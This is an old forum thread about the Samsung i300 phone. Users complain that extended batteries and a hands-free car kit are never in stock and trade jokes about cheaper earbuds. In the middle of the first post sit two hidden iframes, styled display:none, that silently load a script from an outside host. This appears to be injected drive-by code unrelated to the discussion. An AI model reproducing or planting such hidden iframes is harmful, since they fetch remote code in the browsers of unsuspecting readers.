+ Reply to Thread

Angry Extended Battery

OK, I know the Samsung web site shows an extended battery for this phone and so did Sprint's web site, but I am wondering if they really do exist. Has anyone EVER seen one? I like my i300, but the one big negative still is the battery life. My 6035 was much better. I figured I could live w/it because the extended battery was available, and partially made my decision based on the availability of an extended battery.

Over a month ago I ordered accessories from Sprint. About 3 weeks ago, I received the wrong case (which it took over 45 minutes on the phone to TRY to return, finally I got pissed off and told the person to just credit my account the 15 buck and I would keep the damn thing). Finally yesterday my car charger came and today my travel charger arrived. So it looks like we are getting there, but what about the 2 extended batteries I ordered. Does anyone think they will EVER show up?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

On that note, has anyone ever seen the hands free car kit? That has also been out of stock from the beginning as far as I can tell!

Why buy a Hands free kit?

At any Sprint store you can buy a $10.00 earbud/microphone combo which has a button that when pushed takes you to your voice dial entries. Save $189.00 (or you can send it to me)

lizard@core.com (I accept Paypal) Ha Ha

Originally posted by theminor
    On that note, has anyone ever seen the hands free car kit? That has also been out of stock from the beginning as far as I can tell!

Cool

I'm referring to the hand's free car kit, not the earpiece. I don't want to have to put an earbud every time I get into the car - When I'm not takling on the phone!

Administrator

Arrow

thats what the speakerphone is for...

but seriously, they probably dont have enuff of them made yet.. i used to have a kit for my 6035 and for the startac before that, but they did not cost 200 bucks! i dont think the kit is worht that much...

i would get it, but is has to get to the 100 dollar mark...

by the by, i accept paypal also!